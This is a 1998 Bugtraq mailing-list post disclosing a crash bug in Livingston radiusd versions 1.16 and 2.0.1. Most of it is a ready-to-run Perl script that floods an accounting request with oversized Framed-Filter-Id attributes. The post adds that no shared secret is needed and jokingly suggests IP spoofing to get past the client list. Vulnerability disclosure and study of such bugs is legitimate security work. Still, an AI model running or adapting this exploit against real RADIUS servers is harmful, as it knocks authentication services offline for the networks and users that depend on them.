Everhart,Glenn From: Hamdi Tounsi [hamdi.tounsi@ATI.TN] Sent: Wednesday, April 15, 1998 5:39 AM To: BUGTRAQ@NETSPACE.ORG Subject: code to crash radiusd Hi all the following will crash radiusd from livingston, 1.16 and 2.0.1 97/5/22 (the latest version) i alerted livingston a few months ago ... a bugfix should be available now one important thing is that you dont need the shared secret between the radius server and its clients to be able to crash it, since the accounting server will try to log the accounting request (though it will flag it as unverified) of course you need to be listed in the clients config file to be able to send an accounting request. otherwise spoof ;) --hamdi #!/usr/bin/perl use Authen::RadiusAcct; $r = new Authen::RadiusAcct(Host => 'your.radius.server:1646', Secret => 'any_string'); $r->load_dictionary; $r->add_attributes( {Name => 'User-Name', Value => 'anyuser'}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A127','C')}, ); $r->send_packet(4);